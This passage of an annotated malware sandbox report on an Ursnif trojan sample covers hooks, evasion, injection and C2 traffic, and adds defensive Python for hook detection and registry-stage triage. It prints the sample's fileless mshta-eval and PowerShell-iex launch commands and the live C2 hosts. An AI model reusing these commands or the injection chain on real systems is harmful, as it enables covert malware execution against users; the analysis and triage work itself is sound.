Source: explorer.exe User mode code has changed: module: KERNEL32.DLL function: CreateProcessAsUserW new code: 0xFF 0xF2 0x25 0x50 0x00 0x00
Note: all three hook types were observed in explorer.exe, the process the sample injects into. The hooked functions are the process-creation APIs (CreateProcessW, CreateProcessAsUserW), which lets the injected code see and follow every new process the shell starts, and RegGetValueW, which lets it hide its own registry keys from anything that reads them through the shell. The two hook addresses (7FFFAC2D5200 and 7FFFAC2D521C) are 0x1C bytes apart, i.e. both trampolines sit in the same injected region.
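The inline-hook entry above records only that the first bytes of CreateProcessAsUserW in explorer.exe changed. The Python below is an added example (it is neither Joe Sandbox code nor Ursnif code) of the classification step a hook scanner performs once it has the prolog bytes from process memory and from the module's on-disk image: it tells a clean prolog from the trampoline forms inline hooks use and recovers where control is diverted to. Everything in the sample table is constructed; the function names are borrowed from the hook list above, but the bytes and addresses are not the report's.

```python
"""Classify a user-mode function prolog as clean or inline-hooked.

Added example for this report; it is neither Joe Sandbox code nor Ursnif code.
A real scanner reads the first bytes of an exported function from process
memory, reads the same bytes from the module image on disk (PE parser plus
relocations) and compares them.  This helper does only the comparison and the
decoding of the usual trampoline forms, so it runs offline on constructed data.
"""
import struct
from dataclasses import dataclass
from typing import Dict, Optional, Tuple

MASK64 = (1 << 64) - 1


@dataclass
class Verdict:
    hooked: bool
    kind: str                     # clean | jmp_rel32 | jmp_indirect | push_ret | mov_jmp_rax | modified
    target: Optional[int] = None  # branch destination, or the pointer slot for an indirect jmp


def classify_prolog(mem: bytes, disk: bytes, func_va: int, x64: bool = True) -> Verdict:
    """mem/disk: first bytes of the function in memory and in the image; func_va: its VA."""
    n = min(len(mem), len(disk))
    if n and mem[:n] == disk[:n]:
        return Verdict(False, "clean")
    # E9 rel32: jmp to func_va + 5 + rel32, the classic 5-byte patch
    if len(mem) >= 5 and mem[0] == 0xE9:
        rel = struct.unpack_from("<i", mem, 1)[0]
        return Verdict(True, "jmp_rel32", (func_va + 5 + rel) & MASK64)
    # FF 25 disp32: jmp [rip+disp32] on x64 (the pointer slot follows the 6-byte
    # instruction), jmp [abs32] on x86
    if len(mem) >= 6 and mem[0] == 0xFF and mem[1] == 0x25:
        disp = struct.unpack_from("<i", mem, 2)[0]
        slot = (func_va + 6 + disp) & MASK64 if x64 else disp & 0xFFFFFFFF
        return Verdict(True, "jmp_indirect", slot)
    # 68 imm32 C3: push target; ret
    if len(mem) >= 6 and mem[0] == 0x68 and mem[5] == 0xC3:
        return Verdict(True, "push_ret", struct.unpack_from("<I", mem, 1)[0])
    # 48 B8 imm64 FF E0: mov rax, imm64; jmp rax (x64 absolute trampoline)
    if x64 and len(mem) >= 12 and mem[:2] == b"\x48\xB8" and mem[10:12] == b"\xFF\xE0":
        return Verdict(True, "mov_jmp_rax", struct.unpack_from("<Q", mem, 2)[0])
    # Bytes differ but no known trampoline: relocation noise, a hot-patch sled,
    # or a hook form this scanner does not know.  Flag it for a human.
    return Verdict(True, "modified")


# Constructed sample data (not from the report): a typical x64 prolog as it
# appears on disk, and a made-up module base.
CLEAN_PROLOG = bytes.fromhex("4C8BDC49895B0849897310")  # mov r11,rsp; mov [r11+8],rbx; mov [r11+10h],rsi
BASE = 0x7FFFAC2D0000

# name -> (bytes seen in memory, bytes in the image, function VA); names borrowed
# from the hook list in the report, bytes constructed
SAMPLE_FUNCS: Dict[str, Tuple[bytes, bytes, int]] = {
    "RegGetValueW":         (CLEAN_PROLOG, CLEAN_PROLOG, BASE + 0x1000),
    "CreateProcessAsUserW": (b"\xE9" + struct.pack("<i", 0x2000 - 5) + CLEAN_PROLOG[5:],
                             CLEAN_PROLOG, BASE + 0x3000),
    "CreateProcessW":       (b"\xFF\x25" + struct.pack("<i", 0) + CLEAN_PROLOG[6:],
                             CLEAN_PROLOG, BASE + 0x4000),
    "NtQueryDirectoryFile": (b"\x68" + struct.pack("<I", 0x7FFE0000) + b"\xC3" + CLEAN_PROLOG[6:],
                             CLEAN_PROLOG, BASE + 0x5000),
}


def scan(funcs: Dict[str, Tuple[bytes, bytes, int]], x64: bool = True) -> Dict[str, Verdict]:
    """Classify every function in the table; returns name -> Verdict."""
    return {name: classify_prolog(mem, disk, va, x64) for name, (mem, disk, va) in funcs.items()}


if __name__ == "__main__":
    for name, v in scan(SAMPLE_FUNCS).items():
        tgt = f" -> {v.target:#x}" if v.target is not None else ""
        print(f"{name:22s} {'HOOKED' if v.hooked else 'clean':6s} {v.kind}{tgt}")
```

The "modified" verdict matters in practice: a byte difference with no recognisable trampoline is what you get from unapplied relocations or from a hook written as a multi-instruction stub, so a scanner should surface it rather than silently treat it as clean.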
Source: C:\Windows\System32\loaddll32.exe Process information set: NOOPENFILEERRORBOX (2 identical events)
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX (86 identical events)
Note: NOOPENFILEERRORBOX is the SEM_NOOPENFILEERRORBOX flag of SetErrorMode. The process asks Windows not to show the "file not found" dialog when a module or file fails to load, so a missing dependency cannot stall an unattended run with a message box. Many legitimate runtimes set this flag, so on its own it is weak evidence.

Malware Analysis System Evasion:

Contains capabilities to detect virtual machines
Source: C:\Windows\System32\mshta.exe File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Note: the device interface path names the VMware virtual SATA CD-ROM (vendor NECVMWar, product VMware_SATA_CD00). Hypervisor vendor strings in storage device paths are a classic VM tell; the report records only that the path was opened or queried, not what the HTA script compared it against.
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2913
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6007
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\Speech_OneCore\common\SpeechRuntime.exe TID: 6596 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4816 Thread sleep time: -9223372036854770s >= -30000s
Note: 922337203685477 ms is Int64.MaxValue (9223372036854775807) divided by 10000, i.e. the largest possible relative wait expressed in 100-nanosecond units, and the -9223372036854770s entry is the same wait shown as the raw negative (relative) interval passed to the kernel. That is a thread parked indefinitely, not a timed delay a sandbox could wait out, so these two entries do not by themselves indicate sleep-based evasion.
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_6D921B50 FindFirstFileExW,std::_Timevec::_Timevec,FindNextFileW, 1_2_6D921B50
Source: SpeechRuntime.exe, 00000015.00000003.408044845.00000255BD37A000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAWX
Source: SpeechRuntime.exe, 00000015.00000002.429992119.00000255BF480000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: SpeechRuntime.exe, 00000015.00000003.407826903.00000255BD33C000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW0
Source: SpeechRuntime.exe, 00000015.00000003.408044845.00000255BD37A000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW
Source: mshta.exe, 00000026.00000003.498767463.0000022639476000.00000004.00000001.sdmp Binary or memory string: -b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}/
Source: SpeechRuntime.exe, 00000015.00000002.429992119.00000255BF480000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: SpeechRuntime.exe, 00000015.00000002.429992119.00000255BF480000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: SpeechRuntime.exe, 00000015.00000003.404478120.00000255BD348000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: SpeechRuntime.exe, 00000015.00000002.429992119.00000255BF480000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Note: SpeechRuntime.exe is the Windows speech component, and the behavior graph shows it starting on its own rather than as a child of the sample. "Hyper-V RAW" is the name of the Winsock transport provider in mswsock.dll (the string that pairs it with that DLL is visible above) and the other strings are system error-message text, so these entries are sandbox noise rather than VM-detection code from the sample.
Source: C:\Windows\System32\loaddll32.exe Process information queried: ProcessInformation

Anti Debugging:

Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_6D91C480 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 1_2_6D91C480
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_6D925480 OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,__aligned_msize,__aligned_msize,__aligned_msize,__aligned_msize,__aligned_msize,__aligned_msize,__aligned_msize,__cftoe,__aligned_msize,GetFileType,WriteConsoleW,GetLastError,__cftoe,WriteFile,WriteFile,OutputDebugStringW,__CrtDbgReportWV, 1_2_6D925480
Note: both routines look like Visual C++ runtime boilerplate rather than custom checks. 1_2_6D91C480 is the CRT's unhandled-exception path, where IsDebuggerPresent decides whether to break in before UnhandledExceptionFilter runs, and 1_2_6D925480 mixes OutputDebugStringW with CRT internals (__aligned_msize, __cftoe, __CrtDbgReportWV), which is the CRT debug-report routine. They are weak evidence of deliberate anti-debugging.
Contains functionality to read the PEB
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_6D9211D0 mov ecx, dword ptr fs:[00000030h] 1_2_6D9211D0
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_6D914880 mov eax, dword ptr fs:[00000030h] 1_2_6D914880
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_6D921310 mov ecx, dword ptr fs:[00000030h] 1_2_6D921310
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_6D9525FE mov eax, dword ptr fs:[00000030h] 1_2_6D9525FE
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_6D952534 mov eax, dword ptr fs:[00000030h] 1_2_6D952534
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_6D95213B push dword ptr fs:[00000030h] 1_2_6D95213B
Note: fs:[30h] is the 32-bit PEB pointer. Reading it directly is how code checks BeingDebugged or NtGlobalFlag without calling IsDebuggerPresent, and also how position-independent loaders walk the loaded-module list; the listing shows the read, not which field is tested.
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_6D91C480 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 1_2_6D91C480
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_6D906930 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 1_2_6D906930
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_6D906AA0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 1_2_6D906AA0
Note: the three code functions listed under this heading register exception handlers (SetUnhandledExceptionFilter/UnhandledExceptionFilter, plus the GetCurrentProcess/TerminateProcess fail-fast path) and again match CRT startup code. The privilege evidence is the token adjustment by powershell.exe, which is consistent with the cross-process thread injection recorded under HIPS / PFW / Operating System Protection Evasion.

HIPS / PFW / Operating System Protection Evasion:

Compiles code for process injection (via .Net compiler)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File written: C:\Users\user\AppData\Local\Temp\qidcr3ig\qidcr3ig.0.cs
Creates a thread in another existing process (thread injection)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread created: unknown EIP: AE131580
Maps a DLL or memory area into another process
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: unknown target: unknown protection: execute and read and write
Modifies the context of a thread in another process (thread injection)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread register set: target process: 3292
Note: qidcr3ig.0.cs is the source file PowerShell's Add-Type writes to %TEMP% before invoking the C# compiler. Taken together with the section mapping, thread creation and thread-context change against PID 3292, the PowerShell stage compiled native code at runtime and injected into an existing process.
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: unknown unknown
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: unknown unknown
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: unknown Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>'
Note: these two command lines are the sample's fileless launch chain. mshta.exe runs an inline HTA that reads the Actidsrv value of HKCU\Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550 and eval()s it; that stage starts powershell.exe, which reads the basebapi value of the same key as a byte array, converts it to ASCII and runs it with iex. Both stages live only in the registry, so the GUID-named subkey under HKCU\Software\AppDataLow\Software\Microsoft is the place to collect from when triaging a host.
Source: loaddll32.exe, 00000001.00000002.630147501.00000000019D0000.00000002.00000001.sdmp Binary or memory string: uProgram Manager
Source: loaddll32.exe, 00000001.00000002.630147501.00000000019D0000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: loaddll32.exe, 00000001.00000002.630147501.00000000019D0000.00000002.00000001.sdmp Binary or memory string: Progman
Source: loaddll32.exe, 00000001.00000002.630147501.00000000019D0000.00000002.00000001.sdmp Binary or memory string: Progmanlock
Note: Progman, Program Manager and Shell_TrayWnd are the window class and title names of explorer.exe's desktop and taskbar windows. Looking them up is a common way to locate the shell process, consistent with the explorer.exe hooks listed under Hooking and other Techniques for Hiding and Protection.
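The two command lines above tell a responder exactly where the stages are stored, but not what they contain. The Python below is an added example (not Joe Sandbox or Ursnif code) of a triage helper that parses those command lines to find the key and value names, then decodes the values from a .reg export of that key the same way the chain would (regread() returns the string; PowerShell's GetString() turns the byte array into ASCII) without ever executing them. The command lines are the ones recorded in the report; the .reg export is constructed with a harmless stand-in payload under the report's key path.

```python
"""Recover the registry-resident stages behind an mshta -> powershell launch chain.

Added example for this report (neither Joe Sandbox nor Ursnif code).  It extracts
the key and value names from the two recorded command lines and decodes those
values from a .reg export of the key, never executing anything.
"""
import re
from typing import Dict, Tuple

# Command lines as recorded in the report (quoting as shown there).
MSHTA_CMD = r"""'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>'"""
POWERSHELL_CMD = r"""'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))"""

# Constructed .reg export of the report's key with a harmless stand-in payload.
REG_EXPORT = r"""Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550]
"Actidsrv"="new ActiveXObject('WScript.Shell').Run('powershell.exe iex stage2',0)"
"basebapi"=hex:57,72,69,74,65,2d,48,6f,73,74,20,27,\
  73,74,61,67,65,32,27
"""

HIVES = {"HKCU": "HKEY_CURRENT_USER", "HKLM": "HKEY_LOCAL_MACHINE"}


def normalize_key(path: str) -> str:
    """'HKCU:Software\\X' or the script's 'HKCU\\\\\\Software\\\\X' -> 'HKEY_CURRENT_USER\\Software\\X'."""
    path = re.sub(r"\\+", lambda m: "\\", path)     # collapse JScript/PowerShell escaping
    m = re.match(r"([A-Za-z_]+)[:\\](.*)", path)
    if not m:
        raise ValueError(f"not a registry path: {path!r}")
    return HIVES.get(m.group(1).upper(), m.group(1)) + "\\" + m.group(2)


def is_registry_launch_chain(mshta_cmd: str, ps_cmd: str) -> bool:
    """Detection condition: inline HTA that eval()s a registry value, feeding iex."""
    return ("about:<hta:application>" in mshta_cmd and "regread(" in mshta_cmd
            and "eval(" in mshta_cmd and "iex" in ps_cmd and "GetString" in ps_cmd)


def parse_launch_chain(mshta_cmd: str, ps_cmd: str) -> Dict[str, str]:
    """Return the shared key and the value names each stage reads."""
    m1 = re.search(r"regread\('([^']+)'\)", mshta_cmd)
    m2 = re.search(r"gp\s+'([^']+)'\s*\)\s*\.(\w+)", ps_cmd)
    if not (m1 and m2):
        raise ValueError("command lines do not match the regread()/gp pattern")
    key1, stage1 = normalize_key(m1.group(1)).rsplit("\\", 1)
    key2, stage2 = normalize_key(m2.group(1)), m2.group(2)
    if key1.lower() != key2.lower():
        raise ValueError(f"stages live in different keys: {key1} vs {key2}")
    return {"key": key1, "stage1_value": stage1, "stage2_value": stage2}


def parse_reg_export(text: str) -> Dict[str, Dict[str, Tuple[str, object]]]:
    """Minimal .reg parser: {key: {value_name: (kind, data)}} for REG_SZ and hex values."""
    keys: Dict[str, Dict[str, Tuple[str, object]]] = {}
    current, pending = None, ""
    for raw in text.splitlines():
        line = pending + raw.strip()
        if line.endswith("\\"):                  # hex data continues on the next line
            pending = line[:-1]
            continue
        pending = ""
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys[current] = {}
        elif current and line.startswith('"'):
            name, _, value = line[1:].partition('"=')
            if value.startswith('"') and value.endswith('"'):
                # REG_SZ: .reg doubles backslashes and escapes quotes
                keys[current][name] = ("sz", re.sub(r'\\(["\\])', r"\1", value[1:-1]))
            elif value.startswith("hex"):
                kind, _, hexdata = value.partition(":")
                keys[current][name] = (kind, bytes(int(b, 16) for b in hexdata.split(",") if b))
    return keys


def decode_stage(value: Tuple[str, object]) -> str:
    """Turn a stored value into the text the chain would execute, without executing it."""
    kind, data = value
    if kind == "sz":
        return data                                  # what regread() hands to eval()
    if kind in ("hex", "hex(3)"):                    # REG_BINARY: what GetString() produces
        return data.decode("ascii", errors="replace")
    if kind in ("hex(2)", "hex(7)"):                 # REG_EXPAND_SZ / REG_MULTI_SZ are UTF-16LE
        return data.decode("utf-16-le").rstrip("\x00")
    raise ValueError(f"unsupported value kind {kind}")


def recover_stages(mshta_cmd: str, ps_cmd: str, reg_text: str) -> Dict[str, str]:
    chain = parse_launch_chain(mshta_cmd, ps_cmd)
    values = parse_reg_export(reg_text).get(chain["key"], {})
    wanted = (chain["stage1_value"], chain["stage2_value"])
    return {name: decode_stage(values[name]) for name in wanted if name in values}


if __name__ == "__main__":
    print("chain matches:", is_registry_launch_chain(MSHTA_CMD, POWERSHELL_CMD))
    for name, text in recover_stages(MSHTA_CMD, POWERSHELL_CMD, REG_EXPORT).items():
        print(f"{name}: {text}")
```

On a live host the export comes from `reg export "HKCU\Software\AppDataLow\Software\Microsoft\<GUID>" out.reg`; the decoded text is the next stage to analyse, and the key path plus value names are the artefacts to sweep other hosts for.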

Language, Device and Operating System Detection:

Contains functionality to query CPU information (cpuid)
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_6D906610 cpuid 1_2_6D906610
Contains functionality to query locales information (e.g. system language)
Source: C:\Windows\System32\loaddll32.exe Code function: GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA, 1_2_6D8E1B13
Queries the installation date of Windows
Source: C:\Windows\System32\loaddll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation (5 identical events)
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_6D8E1000 GetSystemTime,SwitchToThread,Sleep,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,CreateThread,QueueUserAPC,CloseHandle,GetLastError,TerminateThread,CloseHandle,SetLastError,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError, 1_2_6D8E1000
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_6D8E166F CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError, 1_2_6D8E166F
Source: C:\Windows\System32\Speech_OneCore\common\SpeechRuntime.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Note: the Windows install date and the C: volume information are common inputs for a per-victim identifier, while the locale query fits the language checks banking trojans use to avoid certain regions. The MachineGuid read comes from SpeechRuntime.exe, a Windows component, not from one of the sample's processes.

Stealing of Sensitive Information:

Yara detected Ursnif
Source: Yara match: the same ten memory dumps and the two process memory spaces (powershell.exe PID: 7048, loaddll32.exe PID: 6720) listed under Hooking and other Techniques for Hiding and Protection.

Remote Access Functionality:

Yara detected Ursnif
Source: Yara match: the same ten memory dumps and the two process memory spaces (powershell.exe PID: 7048, loaddll32.exe PID: 6720) listed under Hooking and other Techniques for Hiding and Protection.
Behavior Graph (ID: 351337; sample: SecuriteInfo.com.Trojan.Win...; start date: 10/02/2021; architecture: WINDOWS; score: 100)

Hosts in the graph: c56.lepini.at, api3.lepini.at, resolver1.opendns.com, api10.laptok.at (35.228.31.40, ports 49755, 49756, 49758, GOOGLEUS, United States; contacted by a child iexplore.exe)
Top-level signatures: Multi AV Scanner detection for domain / URL; Found malware configuration; Malicious sample detected (through community Yara rule); 8 other signatures

Process tree (the numbers are the graph's created-file / registry-value counters):
  mshta.exe (19) - Suspicious powershell command line found
    powershell.exe (2, 31) - dropped C:\Users\user\AppData\Local\...\qidcr3ig.0.cs (UTF-8); Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Compiles code for process injection (via .Net compiler); Creates a thread in another existing process (thread injection)
  loaddll32.exe (1) - Writes or reads registry keys via WMI; Writes registry values via WMI
    rundll32.exe
    rundll32.exe
  iexplore.exe (2, 56)
    iexplore.exe (30) - contacts api10.laptok.at 35.228.31.40
    iexplore.exe (30)
    iexplore.exe (30)
  SpeechRuntime.exe (33)

Contacted Public IPs

IP | Domain | Country | ASN | ASN Name | Malicious
35.228.31.40 | unknown | United States | 15169 | GOOGLEUS | true

Contacted Domains

Name | IP | Active
c56.lepini.at | 35.228.31.40 | true
resolver1.opendns.com | 208.67.222.222 | true
api3.lepini.at | 35.228.31.40 | true
api10.laptok.at | 35.228.31.40 | true

Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://api3.lepini.at/api1/y_2FMOeWpuzZk/_2BnXUq3/JVsuHPZPWAuyAx51lbHW1TL/IXSkSA4WVL/DAqpD_2FBMpJwncEg/rZCSM_2By6jC/ilwbgSYz7wD/mcGv71FzhjZLjk/T5o_2Bi_2BnHa_2FHus_2/FtPTy54kQsAO5_2F/YmY57BYO_2F3DGr/PGRRj0Jrbr_2FcDWwI/cfiYP4Yvr/dFVw_2BRaTzNAlHYP_2B/F4QkcLzCJs_2FLyJ_2B/cMYZQA7iSlD9E2ry5mxVYa/rzbbsgjyGZ2a_/2Fo1e83a/dC9sn5XgEM_2FJ7rr6KTfxU/jopGSNBS_2/BO60ALGRt2Y_2Bxa9/6M_2Bh2kKvyG/E_2FWuogkAX/tPVHUrOPK7/MSerDY8wu/3 | false | Avira URL Cloud: safe | unknown
http://api3.lepini.at/api1/QPXSdTpsTN/HmJ5aoUnf9rdkbxHL/55q96h_2FAWR/k9PcTeP3anx/njZx9Znect4yPc/mgdKs7g4jsgOtOBfxx1F8/dzjzqrTWiA9S1bt6/AAS87muT_2BSLDv/WQXbadF0d6swuwTHJY/KpV8Mcid0/fHtmjyLYo7_2F_2FC9mX/FlMafGrpg0QISkwj5AA/Bx9kwrN4mx4ScQVnt0eLjW/cqdTbOZIYSnXb/FOL19o_2/BXbibnK12KkZbqaHWamy8is/edmHREWEDn/WS6dZgPXk2heo8Q98/fno8e4WQ55cB/UHS6HXS3QGn/yz08vW6xSGc_2B/3HnBpBPOsyIhF/0kjBdKE | false | Avira URL Cloud: safe | unknown
http://api10.laptok.at/api1/AOpX_2BLE_2B_2B/x33_2BOxagWAsMnrX_/2B_2BU6zh/wlNMMjJfhf4dJdxy0gqf/YX9lknlxGzswe1f42DY/0ZRJKHiwVKqzREh7F1zZfC/xDcrm70JTSUqg/KfoZXHqy/gtcnRpNm54H7DKUH3incyf7/pb15dMsyWG/BetCueYOwQDaUpKex/cvRYM5W54J_2/F_2BvDZYdxx/C0N9hknbzclgNA/1DbqE0vpldFICv5iJdPAy/ml70ZyZiOpRDJ78b/h5qzpBVY36LCiZe/ZMZBhSfYbmpSZEV5ew/ylnSPhfpP/ctfktke6drAYijwp6R_2/Bn8ddXU | false | Avira URL Cloud: safe | unknown
http://api10.laptok.at/api1/1Pg3i0gSwH/_2BK37nF8HXWhrouM/t7ZtEKshXTnV/JlSrHeYCtLF/7DzeevtXCQ9YRw/K2S8BQMDt78kCRWVvFKTW/T3z7jl77vtn31nAs/fsEjsZ1w6_2BM0e/_2B_2BAVLSWZlML2mx/fdFEX0w2l/0RPfFIvYjfZTYoK47bE8/B49X4mtNiudogIoMpOJ/IxyYMxMKBO_2F3ZR_2BAor/8kAylO6X_2Fiq/EdNEwQOa/FYHDMjDZgQLZqSkWO3yLWuc/j3i_2F5QMC/DRHsxypVX90thJgYh/6MpfO8pdNUGy/KOAPjs479Yf/dCe7rPiQO_2FVf/cp_2BP6SlyfefKqn_2BbT/iqLzQdVK/s | false | Avira URL Cloud: safe | unknown
http://c56.lepini.at/jvassets/xI/t64.dat | true | Avira URL Cloud: phishing | unknown
http://api3.lepini.at/api1/6znaROjfA7hFvImt7kRBj/d8oBlDeaiTpDTw3m/IBQAbTPMeELrV0F/eBc8XtKIPlaG2wOk3_/2FzWsO07N/QVPbwJwjwuG0x_2Bmgtb/T2QshS_2F9rl28gdKaK/ObX5241N6Yuhqoe_2Bb_2F/v7SApCdjSpVoH/vIUqUnsJ/WVeez27cvHmK85aDLttDAUk/ChK5ibvdbq/6hwDFc02b_2F096iz/u_2BBs0hOK08/GFHq_2B8sNe/xc8KOXJRGK_2BT/23ua6L_2BsKd5NwAEGyWZ/BrR5nO2eoCoLivkJ/HCF96ydzEoPKQbD/PpBNddo_2FoZtXcrSVB6/q | false | Avira URL Cloud: safe | unknown
http://api10.laptok.at/favicon.ico | false | Avira URL Cloud: safe | unknown
Note: c56.lepini.at, api3.lepini.at and api10.laptok.at all resolve to 35.228.31.40, and the /api1/ paths are generated per request, so an Avira "safe" verdict on them is a reputation lookup with no prior entry, not evidence that the traffic is benign. Block and hunt on the hosts and the IP rather than on the individual URLs.